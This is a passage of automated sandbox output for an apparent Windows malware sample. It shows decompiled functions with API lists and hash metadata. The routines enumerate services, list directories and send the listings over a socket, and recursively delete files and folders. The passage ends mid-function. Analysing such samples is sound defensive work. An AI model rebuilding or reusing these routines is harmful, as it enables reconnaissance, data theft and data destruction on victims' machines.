					_push(_t201);
					_t87 = E00430CDA( &_v88);
					_v36 = _t87;
					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12,  &_v8,  &_v20);
					_t202 = 0;
					_v32 = 0;
					__eflags = _v8;
					if(__eflags <= 0) {
						L11:
						L00430AAB(_v36);
						goto L12;
					}
					_t199 = _v36;
					do {
						E00405B9B(E00408507(_t133,  &_v112, _t199[1], _t199, __eflags, E004031DB(_t133,  &_v64, "\t")));
						E004031D1();
						E004031D1();
						E00405B9B(E00408507(_t133,  &_v64,  *_t199, _t199, __eflags, E004031DB(_t133,  &_v112, "\t")));
						E004031D1();
						E004031D1();
						_t100 = E004031DB(_t133,  &_v136, "\t");
						E00405B9B(E0040846D( &_v64, E004110F5(_t133,  &_v112, _t199[3]), _t100));
						E004031D1();
						E004031D1();
						E004031D1();
						_v16 = _v16 & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t199, 1);
						_v28 = _t107;
						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t203 = _v16;
								_push(_t203);
								_v24 = E00430CDA( &_v16);
								_t204 = _v24;
								QueryServiceConfigW(_v28, _v24, _t203,  &_v16);
								E00405B9B(E00406D5F(_t133,  &_v136, E004110F5(_t133,  &_v64,  *_v24), _t199, __eflags, "\t"));
								E004031D1();
								E004031D1();
								E00405B9B(E00406D5F(_t133,  &_v136, E004110F5(_t133,  &_v64,  *((intOrPtr*)(_t204 + 4))), _t199, __eflags, "\t"));
								E004031D1();
								E004031D1();
								E00405B9B(E00406D5F(_t133,  &_v136, E00408507(_t133,  &_v64,  *((intOrPtr*)(_t204 + 0xc)), _t199, __eflags, E004031DB(_t133,  &_v112, "\t")), _t199, __eflags, "\n"));
								E004031D1();
								E004031D1();
								E004031D1();
								L00430AAB(_t204);
								_t202 = _v32;
							}
						}
						CloseServiceHandle(_v28);
						_t202 = _t202 + 1;
						_t199 =  &(_t199[9]);
						_v32 = _t202;
						__eflags = _t202 - _v8;
					} while (__eflags < 0);
					_t198 = _v40;
					goto L11;
				}
				E004031DB(_t133, _t198, 0x45595c);
				goto L13;
			}






























                                            0x0041005d
                                            0x00410061
                                            0x0041006a
                                            0x0041006e
                                            0x00410084
                                            0x0041008c
                                            0x00410093
                                            0x0041009a
                                            0x004100b1
                                            0x004100b3
                                            0x004102fc
                                            0x004102fd
                                            0x00410309
                                            0x00410311
                                            0x00410316
                                            0x0041031e
                                            0x0041031e
                                            0x004100bf
                                            0x004100c4
                                            0x00000000
                                            0x00000000
                                            0x004100ca
                                            0x004100cd
                                            0x004100ce
                                            0x004100d7
                                            0x004100ea
                                            0x004100f0
                                            0x004100f2
                                            0x004100f5
                                            0x004100f8
                                            0x004102f3
                                            0x004102f6
                                            0x00000000
                                            0x004102fb
                                            0x004100fe
                                            0x00410101
                                            0x0041011f
                                            0x00410127
                                            0x0041012f
                                            0x00410151
                                            0x00410159
                                            0x00410161
                                            0x00410171
                                            0x00410191
                                            0x00410199
                                            0x004101a1
                                            0x004101ac
                                            0x004101b1
                                            0x004101ba
                                            0x004101c3
                                            0x004101cd
                                            0x004101d3
                                            0x004101d5
                                            0x004101db
                                            0x004101e1
                                            0x004101e4
                                            0x004101ea
                                            0x004101ed
                                            0x004101f4
                                            0x004101fc
                                            0x00410203
                                            0x0041022a
                                            0x00410235
                                            0x0041023d
                                            0x00410264
                                            0x0041026f
                                            0x00410277
                                            0x004102ad
                                            0x004102b8
                                            0x004102c0
                                            0x004102c8
                                            0x004102ce
                                            0x004102d3
                                            0x004102d6
                                            0x004101e4
                                            0x004102da
                                            0x004102e0
                                            0x004102e1
                                            0x004102e4
                                            0x004102e7
                                            0x004102e7
                                            0x004102f0
                                            0x00000000
                                            0x004102f0
                                            0x00410077
                                            0x00000000

                                            APIs
                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,00460A68,00461610), ref: 00410064
                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 004100AB
                                            • GetLastError.KERNEL32(?,00460A68,00461610), ref: 004100B9
                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004100EA
                                            • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,0045B020,00000000,0045B020,00000000,0045B020,?,00460A68,00461610), ref: 004101BA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                                            • String ID:
                                            • API String ID: 2247270020-0
                                            • Opcode ID: eb72e00210521b1deb3c42e2be20ce37dd6d9be0cebe75629ec8a2b379719d82
                                            • Instruction ID: 4b85f707f07ba9afd6e07d7a4e5fedd4992742c582fec591fbaee76bc9e68359
                                            • Opcode Fuzzy Hash: eb72e00210521b1deb3c42e2be20ce37dd6d9be0cebe75629ec8a2b379719d82
                                            • Instruction Fuzzy Hash: 9F811C31E00119ABCB18EB91DC969EFB738EF19305F20806AF512761D1EF786E49CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406317, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 323fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E00406317(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t106;
				intOrPtr* _t111;
				signed int _t121;
				void* _t133;
				void* _t154;
				void* _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t191;
				void* _t199;
				void* _t206;
				char* _t219;
				char* _t220;
				void* _t254;
				void* _t263;
				signed int _t266;
				void* _t272;
				void* _t278;
				void* _t280;
				intOrPtr _t281;
				void* _t282;
				void* _t283;
				void* _t286;

				_t254 = __edx;
				_t188 = __ecx;
				E00447508(E00448A64, _t278);
				_t281 = _t280 - 0x300;
				 *((intOrPtr*)(_t278 - 0x10)) = _t281;
				_t185 = _t188;
				 *(_t278 - 0x18) = _t185;
				E004020CF(_t185, _t278 - 0x9c);
				 *(_t278 - 0x1c) =  *(_t278 - 0x1c) | 0xffffffff;
				 *_t185 = 0;
				 *(_t278 - 4) =  *(_t278 - 4) & 0x00000000;
				_t186 = _t185 + 4;
				E00401677(_t186);
				_t282 = _t281 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t191 = _t186;
				_t106 = E004016F4(_t254, _t263);
				_t288 = _t106;
				if(_t106 == 0) {
					_push(0);
					_push(0);
					goto L4;
				} else {
					_t282 = _t282 - 0x18;
					E00404095(_t186, _t282, E004040B9(_t278 - 0x6c, _t278 + 0x38), _t288, _t191);
					_t186 = _t186 & 0xffffff00 | E00401790(_t186, _t186, _t179, _t288, 0x64, _t278 + 0x50) == 0xffffffff;
					E00401F97();
					_t290 = _t186;
					if(_t186 != 0) {
						E00401AF7( *(_t278 - 0x18) + 4);
						 *((intOrPtr*)(_t278 - 0x20)) = 1;
						_push(0x45d984);
						_t157 = _t278 - 0x20;
						L3:
						_push(_t157);
						L4:
						E0042B694();
					}
				}
				_t265 = E00405635(_t278 + 0x20, _t278 - 0x30);
				_t111 = E004055F8(_t278 + 0x20, _t278 - 0x34);
				E00406D35(_t278 - 0x3c,  *((intOrPtr*)(E00405635(_t278 + 0x20, _t278 - 0x38))),  *_t111,  *_t109);
				_t283 = _t282 + 0xc;
				_t255 = _t278 + 8;
				_t272 = FindFirstFileW(L00404090(E0040590A(_t278 - 0x6c, _t278 + 8, _t290, "*")), _t278 - 0x304);
				 *(_t278 - 0x1c) = _t272;
				_t199 = _t278 - 0x6c;
				E004031D1();
				_t290 = _t272 - 0xffffffff;
				if(_t272 != 0xffffffff) {
					goto L7;
				} else {
					_t282 = _t283 - 0x18;
					E0040207E(_t186, _t282, 0x4554cc);
					_push(0x65);
					E00401790(_t186,  *(_t278 - 0x18) + 4, _t255, _t290);
					E00401AF7( *(_t278 - 0x18) + 4);
					 *((intOrPtr*)(_t278 - 0x24)) = 2;
					_push(0x45d984);
					_t157 = _t278 - 0x24;
					goto L3;
				}
				while(1) {
					L7:
					_t121 = FindNextFileW(_t272, _t278 - 0x304);
					__eflags = _t121;
					if(_t121 == 0) {
						break;
					}
					_t186 =  *(_t278 - 0x18);
					__eflags =  *_t186;
					if( *_t186 == 0) {
						__eflags =  *(_t278 - 0x304) & 0x00000010;
						if(( *(_t278 - 0x304) & 0x00000010) == 0) {
							L31:
							E004031DB(_t186, _t278 - 0x84, _t278 - 0x2d8);
							_t265 = E00405635(_t278 - 0x84, _t278 - 0x3c);
							_t275 = E004055F8(_t278 - 0x84, _t278 - 0x38);
							E00406D35(_t278 - 0x30,  *((intOrPtr*)(E00405635(_t278 - 0x84, _t278 - 0x34))),  *_t139,  *_t137);
							_t283 = _t283 + 8;
							__eflags = E00406BB7(_t278 - 0x84, _t278 + 0x20) - 0xffffffff;
							if(__eflags == 0) {
								L34:
								_t199 = _t278 - 0x84;
								E004031D1();
								_t272 =  *(_t278 - 0x1c);
								continue;
							} else {
								E00401FA1(_t278 - 0x9c, _t255, _t275, E004020A5(_t186, _t278 - 0x54, _t255, __eflags, _t278 - 0x304, 0x250));
								E00401F97();
								_t283 = _t283 - 0x18;
								_t255 = E00404095(_t186, _t278 - 0x54, E004111F2(_t186, _t278 - 0xb4, _t278 + 8), __eflags, 0x46103c);
								E00404095(_t186, _t283, _t152, __eflags, _t278 - 0x9c);
								_push(0x66);
								_t154 = E00401790(_t186, _t186 + 4, _t152, __eflags);
								__eflags = _t154 - 0xffffffff;
								_t186 = _t186 & 0xffffff00 | _t154 == 0xffffffff;
								E00401F97();
								E00401F97();
								__eflags = _t186;
								if(_t186 == 0) {
									goto L34;
								} else {
									 *((intOrPtr*)(_t278 - 0x2c)) = 4;
									_push(0x45d984);
									_t157 = _t278 - 0x2c;
									goto L3;
								}
							}
						} else {
							_t219 = ".";
							_t158 = _t278 - 0x2d8;
							while(1) {
								_t255 =  *_t158;
								__eflags = _t255 -  *_t219;
								if(_t255 !=  *_t219) {
									break;
								}
								__eflags = _t255;
								if(_t255 == 0) {
									L17:
									_t159 = 0;
								} else {
									_t255 =  *((intOrPtr*)(_t158 + 2));
									_t43 =  &(_t219[2]); // 0x2e0000
									__eflags = _t255 -  *_t43;
									if(_t255 !=  *_t43) {
										break;
									} else {
										_t158 = _t158 + 4;
										_t219 =  &(_t219[4]);
										__eflags = _t255;
										if(_t255 != 0) {
											continue;
										} else {
											goto L17;
										}
									}
								}
								L19:
								__eflags = _t159;
								if(_t159 == 0) {
									goto L31;
								} else {
									_t220 = L"..";
									_t160 = _t278 - 0x2d8;
									while(1) {
										_t255 =  *_t160;
										__eflags = _t255 -  *_t220;
										if(_t255 !=  *_t220) {
											break;
										}
										__eflags = _t255;
										if(_t255 == 0) {
											L25:
											_t161 = 0;
										} else {
											_t255 =  *((intOrPtr*)(_t160 + 2));
											_t46 =  &(_t220[2]); // 0x2e
											__eflags = _t255 -  *_t46;
											if(_t255 !=  *_t46) {
												break;
											} else {
												_t160 = _t160 + 4;
												_t220 =  &(_t220[4]);
												__eflags = _t255;
												if(_t255 != 0) {
													continue;
												} else {
													goto L25;
												}
											}
										}
										L27:
										__eflags = _t161;
										if(__eflags == 0) {
											goto L31;
										} else {
											_t255 = E00406D83(_t186, _t278 - 0xb4, _t278 + 8, __eflags, E004031DB(_t186, _t278 - 0x54, _t278 - 0x2d8));
											E00406D5F(_t186, _t278 - 0x6c, _t164, _t265, __eflags, "\\");
											E004031D1();
											E004031D1();
											_t286 = _t283 - 0x18;
											E00405481(_t186, _t286, _t164, __eflags, _t278 + 0x20);
											_t283 = _t286 - 0x18;
											E00405481(_t186, _t283, _t164, __eflags, _t278 - 0x6c);
											_t172 = E00406776(_t186, _t164, __eflags);
											__eflags = _t172;
											if(_t172 != 0) {
												E004031D1();
												goto L31;
											} else {
												 *((intOrPtr*)(_t278 - 0x28)) = 3;
												_push(0x45d984);
												_t157 = _t278 - 0x28;
												goto L3;
											}
										}
										goto L37;
									}
									asm("sbb eax, eax");
									_t161 = _t160 | 0x00000001;
									__eflags = _t161;
									goto L27;
								}
								goto L37;
							}
							asm("sbb eax, eax");
							_t159 = _t158 | 0x00000001;
							__eflags = _t159;
							goto L19;
						}
						L37:
						E00401F97();
						E004031D1();
						E004031D1();
						E00401F97();
						_t133 = E00401F97();
						 *[fs:0x0] =  *((intOrPtr*)(_t278 - 0xc));
						return _t133;
					} else {
						FindClose(_t272);
						_t206 = _t186 + 4;
					}
					L10:
					E00401AF7(_t206);
					goto L37;
				}
				 *(_t278 - 4) =  *(_t278 - 4) | 0xffffffff;
				FindClose(_t272);
				_t266 =  *(_t278 - 0x18);
				E00404095(_t186, _t283 - 0x18, E004040B9(_t278 - 0x54, _t278 + 0x38), __eflags, _t199);
				E00401790(_t186, _t266 + 4, _t124, __eflags, 0x67, _t278 + 0x50);
				E00401F97();
				_t206 = _t266 + 4;
				goto L10;
			}



































                                            0x00406317
                                            0x00406317
                                            0x0040631c
                                            0x00406321
                                            0x0040632a
                                            0x0040632d
                                            0x0040632f
                                            0x00406338
                                            0x0040633d
                                            0x00406341
                                            0x00406344
                                            0x00406348
                                            0x0040634d
                                            0x00406352
                                            0x0040635c
                                            0x0040635d
                                            0x0040635e
                                            0x0040635f
                                            0x00406360
                                            0x00406362
                                            0x00406367
                                            0x00406369
                                            0x00406711
                                            0x00406713
                                            0x00000000
                                            0x0040636f
                                            0x0040636f
                                            0x00406389
                                            0x0040639b
                                            0x004063a1
                                            0x004063a6
                                            0x004063a8
                                            0x004063b0
                                            0x004063b5
                                            0x004063bc
                                            0x004063c1
                                            0x004063c4
                                            0x004063c4
                                            0x004063c5
                                            0x004063c5
                                            0x004063c5
                                            0x004063a8
                                            0x004063d6
                                            0x004063df
                                            0x004063fb
                                            0x00406400
                                            0x0040640f
                                            0x00406429
                                            0x0040642b
                                            0x0040642e
                                            0x00406431
                                            0x00406436
                                            0x00406439
                                            0x00000000
                                            0x0040643b
                                            0x0040643b
                                            0x00406445
                                            0x0040644a
                                            0x00406452
                                            0x0040645a
                                            0x0040645f
                                            0x00406466
                                            0x0040646b
                                            0x00000000
                                            0x0040646b
                                            0x00406473
                                            0x00406473
                                            0x0040647b
                                            0x00406481
                                            0x00406483
                                            0x00000000
                                            0x00000000
                                            0x00406489
                                            0x0040648c
                                            0x0040648f
                                            0x004064a5
                                            0x004064ac
                                            0x004065b3
                                            0x004065c0
                                            0x004065d4
                                            0x004065e5
                                            0x004065ff
                                            0x00406604
                                            0x00406616
                                            0x00406619
                                            0x004066b6
                                            0x004066b6
                                            0x004066bc
                                            0x004066c1
                                            0x00000000
                                            0x0040661f
                                            0x0040663a
                                            0x00406642
                                            0x00406647
                                            0x00406671
                                            0x00406675
                                            0x0040667b
                                            0x00406680
                                            0x00406685
                                            0x00406688
                                            0x0040668e
                                            0x00406699
                                            0x0040669e
                                            0x004066a0
                                            0x00000000
                                            0x004066a2
                                            0x004066a2
                                            0x004066a9
                                            0x004066ae
                                            0x00000000
                                            0x004066ae
                                            0x004066a0
                                            0x004064b2
                                            0x004064b2
                                            0x004064b7
                                            0x004064bd
                                            0x004064bd
                                            0x004064c0
                                            0x004064c3
                                            0x00000000
                                            0x00000000
                                            0x004064c5
                                            0x004064c8
                                            0x004064df
                                            0x004064df
                                            0x004064ca
                                            0x004064ca
                                            0x004064ce
                                            0x004064ce
                                            0x004064d2
                                            0x00000000
                                            0x004064d4
                                            0x004064d4
                                            0x004064d7
                                            0x004064da
                                            0x004064dd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004064dd
                                            0x004064d2
                                            0x004064e8
                                            0x004064e8
                                            0x004064ea
                                            0x00000000
                                            0x004064f0
                                            0x004064f0
                                            0x004064f5
                                            0x004064fb
                                            0x004064fb
                                            0x004064fe
                                            0x00406501
                                            0x00000000
                                            0x00000000
                                            0x00406503
                                            0x00406506
                                            0x0040651d
                                            0x0040651d
                                            0x00406508
                                            0x00406508
                                            0x0040650c
                                            0x0040650c
                                            0x00406510
                                            0x00000000
                                            0x00406512
                                            0x00406512
                                            0x00406515
                                            0x00406518
                                            0x0040651b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040651b
                                            0x00406510
                                            0x00406526
                                            0x00406526
                                            0x00406528
                                            0x00000000
                                            0x0040652e
                                            0x00406552
                                            0x00406557
                                            0x00406563
                                            0x0040656b
                                            0x00406570
                                            0x00406579
                                            0x0040657e
                                            0x00406587
                                            0x0040658e
                                            0x00406593
                                            0x00406595
                                            0x004065ae
                                            0x00000000
                                            0x00406597
                                            0x00406597
                                            0x0040659e
                                            0x004065a3
                                            0x00000000
                                            0x004065a3
                                            0x00406595
                                            0x00000000
                                            0x00406528
                                            0x00406521
                                            0x00406523
                                            0x00406523
                                            0x00000000
                                            0x00406523
                                            0x00000000
                                            0x004064ea
                                            0x004064e3
                                            0x004064e5
                                            0x004064e5
                                            0x00000000
                                            0x004064e5
                                            0x00406738
                                            0x0040673e
                                            0x00406746
                                            0x0040674e
                                            0x00406756
                                            0x0040675e
                                            0x00406766
                                            0x00406773
                                            0x00406491
                                            0x00406492
                                            0x00406498
                                            0x00406498
                                            0x0040649b
                                            0x0040649b
                                            0x00000000
                                            0x0040649b
                                            0x004066c9
                                            0x004066ce
                                            0x004066d4
                                            0x004066f1
                                            0x004066fc
                                            0x00406704
                                            0x00406709
                                            0x00000000

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0040631C
                                              • Part of subcall function 004016F4: connect.WS2_32(?,?,00000010), ref: 0040170F
                                              • Part of subcall function 00401790: send.WS2_32(?,00000000,00000000,00000000), ref: 00401804
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004063C5
                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406423
                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040647B
                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?), ref: 00406492
                                              • Part of subcall function 00401AF7: closesocket.WS2_32(000000FF), ref: 00401AFD
                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004066CE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
                                            • String ID: hF$lVE
                                            • API String ID: 2104358809-3621197459
                                            • Opcode ID: 5116cea31ceeee63fb8facdda837a16107e98917433be2dd997ade25936d1205
                                            • Instruction ID: ec9477f39892d5e51ce53a046611452d9cdd5496eee18da2d305b221aee281a4
                                            • Opcode Fuzzy Hash: 5116cea31ceeee63fb8facdda837a16107e98917433be2dd997ade25936d1205
                                            • Instruction Fuzzy Hash: 0EC17E719001099ACB14FB60DD52AEE7779AF11318F50417FE906BB1E1EF38AB49CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041146E, Relevance: 13.6, APIs: 9, Instructions: 147fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041146E(WCHAR* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				signed int _t52;
				intOrPtr _t53;
				char _t54;
				short _t55;
				signed int _t56;
				intOrPtr _t57;
				char _t58;
				signed int _t63;
				char _t68;
				void _t72;
				void _t73;
				signed int _t78;
				signed int _t84;
				void* _t86;
				intOrPtr* _t89;
				signed short* _t90;
				void* _t91;
				signed int _t95;
				void* _t100;
				void* _t102;
				signed short* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t123;
				void* _t124;

				_v12 = __ecx;
				_t103 = __ecx;
				_t118 =  &_v1052 - __ecx;
				do {
					_t52 =  *_t103 & 0x0000ffff;
					 *(_t118 + _t103) = _t52;
					_t103 =  &(_t103[1]);
				} while (_t52 != 0);
				_t89 =  &_v1052 - 2;
				do {
					_t53 =  *((intOrPtr*)(_t89 + 2));
					_t89 = _t89 + 2;
				} while (_t53 != 0);
				_t54 = L"\\*"; // 0x2a005c
				 *_t89 = _t54;
				_t106 =  &_v532 - __ecx;
				_t55 =  *0x45b15c; // 0x0
				 *((short*)(_t89 + 4)) = _t55;
				_t90 = __ecx;
				do {
					_t56 =  *_t90 & 0x0000ffff;
					 *(_t106 + _t90) = _t56;
					_t90 =  &(_t90[1]);
				} while (_t56 != 0);
				_t110 =  &_v532 - 2;
				do {
					_t57 =  *((intOrPtr*)(_t110 + 2));
					_t110 = _t110 + 2;
				} while (_t57 != 0);
				_t58 = "\\"; // 0x5c
				 *_t110 = _t58;
				_t86 = FindFirstFileW( &_v1052,  &_v1644);
				if(_t86 == 0xffffffff) {
					L34:
					return 0;
				}
				_t91 = 0;
				do {
					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
					_t91 = _t91 + 2;
					 *(_t123 + _t91 - 0x41a) = _t63;
				} while (_t63 != 0);
				_v5 = 1;
				do {
					if(FindNextFileW(_t86,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L33:
							FindClose(_t86);
							goto L34;
						}
						_t68 = 0;
						_v5 = 0;
						goto L23;
					}
					if(E004113F8( &(_v1644.cFileName)) != 0) {
						L22:
						_t68 = _v5;
						goto L23;
					}
					_t107 =  &(_v1644.cFileName);
					_t120 = _t107;
					do {
						_t72 =  *_t107;
						_t107 = _t107 + 2;
					} while (_t72 != 0);
					_t108 = _t107 - _t120;
					_t112 =  &_v532 - 2;
					do {
						_t73 =  *(_t112 + 2);
						_t112 = _t112 + 2;
					} while (_t73 != 0);
					_t95 = _t108 >> 2;
					memcpy(_t112, _t120, _t95 << 2);
					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
					_t124 = _t124 + 0x18;
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L33;
						} else {
							_t100 = 0;
							do {
								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
								_t100 = _t100 + 2;
								 *(_t123 + _t100 - 0x212) = _t78;
							} while (_t78 != 0);
							goto L22;
						}
					}
					if(E0041146E( &_v532) == 0) {
						goto L33;
					}
					RemoveDirectoryW( &_v532);
					_t102 = 0;
					do {
						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
						_t102 = _t102 + 2;
						 *(_t123 + _t102 - 0x212) = _t84;
					} while (_t84 != 0);
					goto L22;
					L23:
				} while (_t68 != 0);
				FindClose(_t86);
				return RemoveDirectoryW(_v12);
			}






































                                            0x00411482
                                            0x00411485
                                            0x00411487
                                            0x00411489
                                            0x00411489
                                            0x0041148c
                                            0x00411490
                                            0x00411493
                                            0x0041149e
                                            0x004114a3
                                            0x004114a3
                                            0x004114a7
                                            0x004114aa
                                            0x004114af
                                            0x004114ba
                                            0x004114bc
                                            0x004114be
                                            0x004114c4
                                            0x004114c8
                                            0x004114ca
                                            0x004114ca
                                            0x004114cd
                                            0x004114d1
                                            0x004114d4
                                            0x004114df
                                            0x004114e4
                                            0x004114e4
                                            0x004114e8
                                            0x004114eb
                                            0x004114f0
                                            0x004114f5
                                            0x0041150b
                                            0x00411510
                                            0x00411658
                                            0x00000000
                                            0x00411658
                                            0x00411516
                                            0x00411518
                                            0x00411518
                                            0x00411520
                                            0x00411523
                                            0x0041152b
                                            0x00411530
                                            0x00411534
                                            0x00411544
                                            0x00411648
                                            0x00411651
                                            0x00411652
                                            0x00000000
                                            0x00411652
                                            0x0041164a
                                            0x0041164c
                                            0x00000000
                                            0x0041164c
                                            0x00411557
                                            0x004115d8
                                            0x004115d8
                                            0x00000000
                                            0x004115d8
                                            0x00411559
                                            0x00411561
                                            0x00411563
                                            0x00411563
                                            0x00411566
                                            0x00411569
                                            0x00411574
                                            0x00411576
                                            0x00411579
                                            0x00411579
                                            0x0041157d
                                            0x00411580
                                            0x00411587
                                            0x0041158a
                                            0x00411598
                                            0x00411598
                                            0x0041159a
                                            0x004115fc
                                            0x0041160a
                                            0x0041160a
                                            0x0041161f
                                            0x00000000
                                            0x00411621
                                            0x00411623
                                            0x00411625
                                            0x00411625
                                            0x0041162d
                                            0x00411630
                                            0x00411638
                                            0x00000000
                                            0x0041163d
                                            0x0041161f
                                            0x004115a9
                                            0x00000000
                                            0x00000000
                                            0x004115b6
                                            0x004115be
                                            0x004115c0
                                            0x004115c0
                                            0x004115c8
                                            0x004115cb
                                            0x004115d3
                                            0x00000000
                                            0x004115db
                                            0x004115db
                                            0x004115e4
                                            0x00000000

                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,?,?,0046103C), ref: 00411505
                                            • FindNextFileW.KERNEL32(00000000,?,?,?,0046103C), ref: 0041153C
                                            • RemoveDirectoryW.KERNEL32(?,?,?,0046103C), ref: 004115B6
                                            • FindClose.KERNEL32(00000000,?,?,0046103C), ref: 004115E4
                                            • RemoveDirectoryW.KERNEL32(?,?,?,0046103C), ref: 004115ED
                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,0046103C), ref: 0041160A
                                            • DeleteFileW.KERNEL32(?,?,?,0046103C), ref: 00411617
                                            • GetLastError.KERNEL32(?,?,0046103C), ref: 0041163F
                                            • FindClose.KERNEL32(00000000,?,?,0046103C), ref: 00411652
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                            • String ID:
                                            • API String ID: 2341273852-0
                                            • Opcode ID: cd499ab538e5cd56c6e1567d84a535d2d613f715f6b3db756a9d5b251d87531d
                                            • Instruction ID: 29648440e0b205e60304e19d41b2717b98bed81d3a3cc78e90003bf1a5f8bf00
                                            • Opcode Fuzzy Hash: cd499ab538e5cd56c6e1567d84a535d2d613f715f6b3db756a9d5b251d87531d
                                            • Instruction Fuzzy Hash: 6751093450015A8BCF24DF68C8886FBB3B5FF55304F4441AAD90A93260FB769EC6CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040C00C, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 479registrylibraryloaderCOMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E0040C00C(void* __edx, void* __eflags, char _a8) {
				char _v36;
				char _v48;
				char _v52;
				char _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				struct _SECURITY_ATTRIBUTES _v104;
				char _v108;
				void* _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				void* _t88;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;
				signed int _t105;
				void* _t120;
				void* _t121;
				void* _t123;
				void* _t127;
				char _t132;
				signed short* _t135;
				void* _t137;
				void* _t141;
				void* _t146;
				void* _t150;
				void* _t152;
				void* _t153;
				void* _t155;
				signed int _t156;
				intOrPtr* _t158;
				void* _t160;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t181;
				void* _t182;
				long _t185;
				void* _t192;
				signed short* _t195;
				void* _t205;
				void* _t217;
				void* _t233;
				void* _t247;
				void* _t255;
				signed int _t258;
				void* _t310;
				signed int _t313;
				void* _t321;
				signed int _t326;
				signed int _t329;
				void* _t332;
				void* _t334;
				void* _t339;
				void* _t341;
				void* _t343;
				signed int _t344;
				void* _t345;
				signed int _t351;
				signed int _t352;
				void* _t355;
				void* _t356;
				void* _t357;
				void* _t360;
				void* _t365;
				void* _t366;
				void* _t368;
				void* _t369;
				void* _t371;
				void* _t372;
				void* _t373;
				void* _t374;
				void* _t376;
				void* _t378;
				void* _t383;

				_t383 = __eflags;
				_t320 = __edx;
				_push(_t203);
				_t77 = E00401F2E( &_a8);
				_push(0xffffffff);
				_t332 = 4;
